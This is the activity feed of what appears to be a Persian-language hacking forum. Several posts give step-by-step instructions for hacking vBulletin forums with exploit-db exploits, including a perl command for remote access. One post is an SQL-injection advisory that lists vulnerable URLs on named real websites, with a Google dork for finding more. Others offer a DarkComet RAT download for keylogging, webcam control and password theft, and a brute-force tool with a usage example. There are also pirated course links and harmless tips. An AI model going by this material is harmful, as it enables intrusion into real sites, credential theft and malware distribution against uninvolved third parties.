امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

تمامی فعالیت ها

این جریان به طور خودکار به روز می شود     

  1. دیروز
  2. Rednofozi

    Hacking

    امنیت در مقابل هک ویبولتین برای امن سازی این انجمن ساز حرفه ای به نکات زیر توجه کنید اپدیت های انجمن ساز را به موقع نصب نمایید از لایسنس اصلی استفاده کنید و از نسخه های نال شده خوداری کنید از سرور های امن و اختصاصی استفاده نمایید افزونه ها و تیم های غیر قابل اعتماد را نصب نکنید
  3. Rednofozi

    Hacking

    هک ویبولتین چگونه انجام میشود؟ vBulletin چیست ؟ ویبولتین یک سیستم برای ساخت انجمن میباشد که بسیاری از وبسایت های انجمن دنیا از این سیستم انحمن ساز استفاده میکنند امروزه سیستم های انجمن ساز های زیادی را مشاهده میکنیم اما vBulletin یکی از محبوب ترین ها و قدیمی ترین انجمن ساز ها است که در سال ۲۰۰۰ اولین نسخه ان منتشر شده است و به زبان php نوشته شده است این انجمن ساز به صورت غیر رایگان میباشد اما به طور کلی در وبسایت های زیادی نسخه های null ان موجود میباشد که میتوانید با نصب و استفاده از ان به صورت رایگان از ان استفاده کنید نکته: در اغلب اوقات در بیشتر اسکریپت های نال شده اشکالات و حتی بکدور وجود دارد پس دقت کنید که با این مشکلات مواجه نشوید روش های هک ویبولتین متخصصان امنیت بر روی تمام اسکریپت های امنیت کار میکنند که این باعث میشود اکسپلویت های زیادی برای اسکریپت های تحت وب منتشر شود به همین دلیل ما در این اموزش چند اکسپلویت حساس برای هک ویبولتین را معرفی میکنیم اکسپلویت ویبولتین نسخه ۳٫۶٫۰ تا ۴٫۲٫۳ ابتدا وارد لینک زیر شوید و اکسپلویت را دریافت کنید https://www.exploit-db.com/exploits/40751/ میبینید که روش های قدم به قدم دامپ دیتابیس سایت را مثال زده است برسی شبکه بیسیم با ابزار FruityWiFi و اسیب پذیری در صفحه مربوطه را مشخص کرده است به طور مثال در ادرس زیر میتوانید حملات Sqli را انجام دهید =https://site.com/forumrunner/request.php?d=1&cmd=get_spam_data&postids برای یادگیری انجام حملات اموزش sql injection را میتوانید مشاهده کنید اکسپلویت ویبولتین نسخه ۵٫x در این اکسپلویت میتوانید تمامی ویبولتین های ۵ را دسترسی بگیرید این اکسپلویت از باگ RCE استفاده میکند و مانند اکسپلویت قبلی از نوع sqli نمیباشد ابتدا از لینک زیر اکسپلویت را دریافت کنید https://www.exploit-db.com/download/38790.pl نکته : دقت داشته باشید برای اجرای این اکسپلویت اکتیو پرل را در سیستم خود نصب کرده باشید در صورتی که ان را نصب نکرده اید از اینجا ان را دریافت و نصب کنید بعد از دریافت در کنسول خود فایل اکسپلویت را به صورت زیر اجرا کنید perl 38790.pl بعد از اجرا در بخش Enter Target سایت مورد نظری که ای این انجمن ساز استفاده میکند را وارد کنید و درصورت اسیب پذیر بودن به این اکسپلویت دسترسی از نوع ریموت از راه دور خواهید گرفت
  4. معرفی ابزار جمع اوری اطلاعات Crips ابزاری برای جمع اوری اطلاعات میباشد که به زبان bash نوشته شده است و به همین دلیل قابل نصب در لینوکس میباشد اما دوستانی که از ویندوز استفاده میکنند نگران نباشند چون همراه با این ابزار نسخه دیگری با زبان پایتون نوشته شده است که میتوانند در ویندوز و هر سیستم عامل دیگری از ان استفاده کنند دقت داشته باشید با استفاده از پایتون نسخه ۲٫۷ اجرا شود امکانات Whois : نمایش اطلاعات دامنه Reverse IP : برسی ای پی های سرور Traceroute : برسی پکت ها DNS Port Scan : اسکن پورت های سرور Reverse DNS : استخراج dns های سرور GeoIP : محل سرور INSTALL و UPDATE قابلیت نصب و اپدیت ابزار در سیستم عامل ها https://github.com/Manisso/Crips
  5. https://cxsecurity.com/issue/WLB-2018100166 |--------------------------------------------------------------| |--------------------------------------------------------------| |[+] Exploit Title: جميع الحقوق محفوظة لمعهد صناعة الحياة للتدريب والاستشارات © 2018 SQL Injection Vulnerability |[+] Date:19/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: https://sactr.net |[+] dork: intext:جميع الحقوق محفوظة لمعهد صناعة الحياة للتدريب والاستشارات © 2018 inurl:abroad/page.php?cid= |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : inj3ct0r Anonysec hackers iran team |[+] Vulnerability Type :SQL Injection |[+] Severity Level :Med. |[+] Exploit :info SQL Injection Vulnerability -------------->abroad/page.php?id ***************************************************************| Google Search intext:جميع الحقوق محفوظة لمعهد صناعة الحياة للتدريب والاستشارات © 2018 Warning: mysql_free_result() expects parameter 1 to be resource, boolean given in /home/sactr/public_html/abroad/page.php on line 22 SQL Injection Vulnerability -------------->abroad/page.php?id ***************************************************************| RHG Team hackers |--------------------------------------------------------------| SQL Injection Vulnerability https://sactr.net/abroad/page.php?id=15%27 http://ic.thu.edu.tw/web/abroad/page.php?scid=7&sid=12 https://www.thecabincrossfit.com/our-trainers.php/abroad/page.php?scidid=25 https://horseracebase.com/abroad/page.php?scid http://www.perfectfit24-7.com/abroad/page.php?scid About 14.200 results **************************************************************** Discovered by : Inj3ct0r | Rednofozi RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi
  6. Moeein Seven

    Miscellaneous

    کل پکیج های VIP وبسایت apktops رایگان :)))) https://tg-go.noyes.in/i/BQADBQADFAAD86m_ERZRCHODRsaZAg/1f404fdf284e1c63af026e38c2656c29/1540117983 https://tg-go.noyes.in/i/BQADBQADFgAD86m_EXeV_y6qVHabAg/632e19147fc2d128e38dd710b30b1481/1540117983 https://tg-go.noyes.in/i/BQADBQADFQAD86m_EeDXkkxpnxISAg/321967e3d94aef5acd1f8c8864348b3f/1540117983 https://tg-go.noyes.in/i/BQADBQADFwAD86m_EW6Ord86Vl2uAg/e13917dc2459650ce5ed209d5b768593/1540117984
  7. دوره آموزشی برنامه نویسی اندروید از فرانش https://tg-go.noyes.in/i/BQADBAADJQIAAngMBBHV-c7b8aiwfQI/1e020f4a98684cb3fd2f5669e2e7ec2d/1540117848 https://tg-go.noyes.in/i/BQADBAADJgIAAngMBBGWgpntibzmVQI/9bbbcb49f98a721afededdbc7f61c373/1540117849 https://tg-go.noyes.in/i/BQADBAADJwIAAngMBBHcT9nLh9DyMwI/afa107acebd7f0aeed17afb30558e49b/1540117891 https://tg-go.noyes.in/i/BQADBAADKQIAAngMBBHNDbUhjOSbiQI/abdb50919b97f76ed1ad9e42d47857ca/1540117892 https://tg-go.noyes.in/i/BQADBAADGAIAAg0HwQiwMywL5rThlQI/8a90fa0f6fc748827434b945d91af116/1540117892 https://tg-go.noyes.in/i/BQADBAADKAIAAngMBBE_TkW2_TK1nQI/c02156fb2db78271798f4c402bc14eb3/1540117892
  8. دوره آموزشی امنیت سیستم عامل از لرن فایلز منبع لرن فایلز قیمت 47.000 تومان حجم 1,1 گیگابایت https://tg-go.noyes.in/i/BQADBAAD9wMAAt9XrA-kzrLWak8oQwI/0fe6110be3da4352c0b6630a993dadbb/1540117743
  9. Moeein Seven

    Developer

    دوره آموزشی 0 تا 100 جوملا https://tg-go.noyes.in/i/BQADBAADxAAD31esD26fbYdFK7-AAg/4ae36737a8cdc2bb59ef757b6f2569e1/1540117669 https://tg-go.noyes.in/i/BQADBAADxQAD31esD7Zjh6MfB935Ag/3f532099a17709eecc28ab45a5659c4e/1540117669 https://tg-go.noyes.in/i/BQADBAADxwAD31esDwtPLZa0wKIeAg/a631d56498b9a7c35c08f21e9e4b8ef2/1540117670 https://tg-go.noyes.in/i/BQADBAADxgAD31esD8LFbOOBtcT9Ag/f407239d808e7052aebba5ef059eb10b/1540117670
  10. پکیج ایده پردازی در کسب و کار اینترنتی سایت : fekreabi.net قیمت :۱۱,۷۰۰ تومان https://tg-go.noyes.in/i/BQADBAADvgADXq_IUBfMoZFiu1FwAg/80774fbc7e37bdf504fc7fb105737ce9/1540117611
  11. فرض کنید که در مرورگر کروم چند سربرگ یا تب باز شده دارید که یکی از آنها فرم ثبت نامی است که تا نصفه آن را پر کرده اید. حال اگر شما روی یک تب دیگر کلیک کنید و پس از مدت تقریبا طولانی دوباره به تب فعلی برگردید صفحه به طور اتوماتیک شروع به لود شدن خودکار می کند و شما باید دوباره همه چیز را از اول پر کنید. راه حل بصورت زیر است : برای غیرفعال کردن ویژگی Discarding Tabs یک تپ جدید باز کنید و در نوار آدرس عبارت Chrome://Flags را تایپ و یا کپی پیست کنید. بعد کلید اینتر را فشار دهید. حالا پنجره ای مانند زیر برای شما باز می شود. در کادر جستجو عبارت Tab Discarding را تایپ کنید و اینتر کنید. در صفحه زیر روی دکمه آبی Disabled کلیک کنید و بعد روی Relaunch Now کلیک کنید. گوگل کروم به طور خودکار ریستارت می شود تا تغییرات را اعمال کند.
  12. به یاد داشته باشید که شما نمی توانید کامنت های افراد دیگر را در لایو اینستاگرام پاک کنید. شما فقط می توانید کامنت ها را مخفی کنید و یا اینکه هنگام پخش لایو اینستاگرام کامنت ها را ببندید. روش کار به صورت زیر است : روی دوربین اینستاگرام تپ کنید. در پایین صفحه گزینه های مختلفی مانند تصویر زیر خواهید دید روی LIVE کلیک کنید. روی Start Live Video تپ کنید. روی سه نقطه در سمت راست کادر کامنت تپ کنید. بعد روی Turn Off Commenting تپ کنید. حالا شما باید در کادر کامنت عبارت Comments Turned Off را ببینید. اگر خواستید کامنت گذاری را فعال کنید بازم روی سه نقطه تپ کنید و Turn On Commenting را انتخاب کنید.
  13. Moeein Seven

    Trick-Apple

    خیلی از کاربر هایی که برنامه ها را از اپ استور خریداری میکنند بعد از شارژ کردن اپل ایدی خود هنگام خرید از اپ استور با پرسش های امنیتی یا همان security questions مواجه میشوند که ممکن است شما جواب این سوالات را در ذهنتان نداشته باشید که در این صورت نمیتوانید چیزی را از اپ استور خریداری کنید. چطور security questions اپل ایدی خود تا تغییر دهیم؟ با مرورگر به آدرس http://appleid.apple.com مراجعه فرمایید. بر روی صفحه باز شده گزینه Manage your Apple ID را انتخاب نمایید. با اپل ایدی خودتان وارد شودید. یک منو Edit your Apple ID باز شده که شما باید از این بخش گزینه Password and Security را انتخاب نمایید سوال مورد نظر خود را انتخاب کنید و جوابی که به خاطر خود میسپارید به این سوال بدهید تا ان را فراموش نکنید. گزینه Save را انتخاب کنید. اگر به ايميل نجات دهنده دسترسي نداريد باید از طریق تماس یا ایمیل با اپل در ارتباط باشید ولی چون تماس تلفنی فقط از طریق اسکایپ برای کاربر های ایرانی قابل انجام هست ما برای شما ایمیلی که باید اپل ارسال کنید را اماده کرده ایم apple ID: ادرس اپل ایدی شما password: پسورد شما Thanks in advance sincerely Yours your name اسم شما به زبان انگلیسی این ایمیل رابه آدرس زیر ارسال کنید
  14. اگر اقدام به نصب آفیس 2013 کرده باشید حتماً متوجه شده‌اید که اگر بر روی فایل یا پوشه‌ای راست‌کلیک کنید گزینه‌‌ای به نام SkyDrive Pro به این منو اضافه شده است. از این گزینه می‌توان برای به اشتراک‌گذاری فایل‌ها با یک سرور Microsoft SharePoint استفاده کرد. اما در عمل تقریباً این گزینه یک گزینه‌ی بلا استفاده است و کمتر کاربری از آن استفاده می‌کند. با استفاده از این ترفند می‌توانید SkyDrive Pro را از منوی راست‌کلیک ویندوز حذف کنید. این کار به دو روش قابل انجام است. کلیدهای ترکیبی Win+R را فشار دهید. در پنجره‌ی Run عبارت regedit را وارد نموده و Enter بزنید. حال در پنجره‌ی Registry Editor به مسیر زیر بروید: HKEY_CLASSES_ROOT\AllFilesystemObjects\shell حال بر روی کلید SPFS.ContextMenu راست‌کلیک کرده و Delete و سپس Yes را انتخاب نمایید. تغییر بلافاصله اعمال خواهد شد.
  15. قابلیت Write Caching یکی از ویژگی های موجود در ویندوز ویستا و ویندوز ۷ است که شما را قادر می سازد تا اطلاعات تان را قبل از نوشته شدن در هارد دیسک در کش بنویسید. این ویژگی باعث افزایش عملکرد و سرعت هارد دیسک می شود. روش فعالسازی به صورت زیر است : برای فعال سازی این ویژگی روی دکمه Start ویندوز کلیک کنید در کادر جستجو عبارت Device Manager را تایپ کنید در پنجره Device Manager هارد دیسک خود را انتخاب کنید و روی آن کلیک راست کنید. سپس Properties را انتخاب کنید. در منوی Properties روی سربرگ Policies کلیک کنید. گزینه Enable Write Caching On The Device را انتخاب کنید و روی دکمه OK کلیک کنید.
  16. هفته گذشته
  17. Rednofozi

    Hacking

    توضیحات این ابزار این ابزار که tweets_analyzer نام دارد توسط فردی به نام x0rz نوشته شده است. این ابزار که به زبان پایتون نوشته شده است برای انالیز اکانت های توییتر ویژگی هایی استفاده میکند که عبارت اند از: میانگین توییت کردن کاربر در هر ساعت و هر روز منطقه زمانی و زبان استفاده کاربر از اپلیکیشن موبایل و وب بروزر موقعیت مکانی بیشترین هشتک ها بیشترین ریتوییت ها زبان و مکان دوستان کاربر نحوه نصب اول از همه API keys موجود در secrets.py را بروزرسانی کنید. برای بدست اوردن API keys از وبسایت برنامه های توییتر استفاده کنید. نکته:برای اجرای این اسکریپت پایتونی شما به پایتون نسخه ۲٫۷ یا جدیدتر نیازمند هستید. شما نیز دارید تا پکیج های پایتونی از جمله tweepy, ascii_graph, tqdm, numpy را نصب کنید. برای نصب این پکیج ها از دستور زیر استفاده کنید: pip install -r requirements.txt نحوه اجرا برای اجرای اسکریپت پایتونی انالیز اکانت های توییتر از دستور زیر استفاده کنید: tweets_analyzer.py -n username [options] دستورات برای تنظیمات(options) دستور help h- دستوری برای انجام انالیزی سریع برای دوستان کاربر بر اساس منطقه زمانی و زبان friends– دستوری برای محدود کردن تعداد توییت های مورد بررسی l- نکته:بعد از l تعداد توییت مورد نظرتان را وارد کنید. دستوری برای ذخیره کردن فایل ها بصورت JSON j- https://github.com/x0rz/tweets_analyzer
  18. Rednofozi

    Hacking

    اموزش نصب ابزار برای نصب در سیستم عامل لینوکس خود میتوانید از دستور زیر استفاده کنید اما درصورتی که این ابزار در مخازن موجود نبود میتوانید با استفاده از روش زیر جداگانه نصب کنید در ابتدا لینک را از بخش دانلود در اخر صفحه دریافت کنید و جایگزین Link در دستور زیر کنید git clone Link وارد پوشه دانلود شده شوید cd brutespray با دستور زیر پیشنیاز های ابزار را نصب کنید pip install -r requirements.txt حال برای نمایش سویچ های ابزار دستور زیر را وارد کنید python brutespray.py -h نحوه استفاده برای استفاده و بروت فورس یک سرویس با استفاده از ابزار معرفی شده به مثال زیر توجه کنید python brutespray.py –file nmap.gnmap -u admin -p password –threads 5 –hosts 5 در ابتدا با استفاده از پایتون ابزار را اجرا کردیم با سویچ –file خروجی nmap را وارد کردیم و با -u یوزرنیم خود را وارد میکنیم و با استفاده از -p یک پسورد انتخاب میکنیم با استفاده از –threads سرعت انجام تست نفوذ را بسته به سرعت خود انتخاب کنید و در سویچ –hosts تعداد سرویس را انتخاب کنید پشتیبانی ابزار از سرویس های : ssh ( سرویس اتصال بین سرور ) ftp ( سرویس انتقال فایل ) telnet (سرویس اتصال بین سرور ویندوز) vnc (اتصال گرافیکی) mssql (دیتابیس) mysql (دیتابیس) smtp (ایمیل) بروت فورس و امنیت چندین راه برای جلوگیری از حملات بروت فورس وجود دارد که میتواند در سرویس های مختلف متفاوت باشد ما به چند نمونه از راه های امنیت در مقابل حملات بروت فورس میپردازیم استفاده از کپچا در صفحات ورد وبسایت ها محدود کردن ای پی در سرویس بلاک کردن ای پی هنگام وارد کردن چندین باره پسورد ابزار های تشخیص ربات استفاده از پسورد های طولانی با کارکتر های مختلف https://github.com/x90skysn3k/brutespray
  19. Rednofozi

    Hacking-Virus

    قابلیت ها و دانلود DarkComet کیلاگر کنترل و هک وبکم پنل کنترل استخراج پسورد های ذخیره شده در سیستم ریموت به صورت رنده از طریق پنل رات اجرای رات بعد از ریاستارت امکان استفاده در شبکه داخلی و خارجی برسی و مدیریت فایل ها اجرای دستور رمزنگاری فایل ویروس سازگار با تمامی ویندوز ها امکان اتصال به چندین کلاینت همزمان کنترل برنامه های در حال اجرا …https://anonfile.com/N7d3z8j4bb/DarkComet-RAT-v5.3_zip
  20. در دستور کلمه Link را جایگزین لینک دانلود در بخش اخر صفحه کنید git clone Link حال وارد پوشه دانلود شده شوید cd WhatCMS اجازه دسترسی بالا را به فایل اصلی بدهید chmod 775 whatcms.sh میتوانید با دستور زیر ابزار را اجرا کنید whatcms.sh/. نحوه استفاده ابزار برای اسکن و شناسایی سیستم مدیریت محتوا دستور بالا و ادرس سایت را وارد کنید whatcms.sh site.com/. با استفاده از این ابزار میتوانید اطلاعات بیشتری بدست اورید که با استفاده از ان مشاهده خواهید کرد https://github.com/HA71/WhatCMS,git
  21. Moeein Seven

    Miscellaneous Tricks

    دوست عزیز لطفا از قرار دادن تبلیغات بی رویه مانند کانال تلگرام و... در پست ها خودداری کنید شما 1 امتیاز منفی دریافت خواهید کرد موفق باشید
  22. نمونه طرح تکستچر استقلال با جمله ی "ناراحت نباش قهرمان" طراح : @Mehrad_Ahmadi
  23. Mehrad_Ahmadi

    Graphics-Samples

    نمونه طرح داریوش شجاعیان طراح : @Mehrad_Ahmadi
  24. Mehrad_Ahmadi

    Graphics-Samples

    نمونه طرح فرشید اسماعیلی طراح : @Mehrad_Ahmadi
  25. Mehrad_Ahmadi

    Graphics-Samples

    نمونه طرح پژمان منتظری طراح : @Mehrad_Ahmadi
  26. Mehrad_Ahmadi

    Graphics-Samples

    نمونه طرح پادوانی طراح : @Mehrad_Ahmadi
  27. Mehrad_Ahmadi

    Graphics-Samples

    نمونه طرح محسن کریمی طراح :@Mehrad_Ahmadi
  1. نمایش فعالیت های بیشتر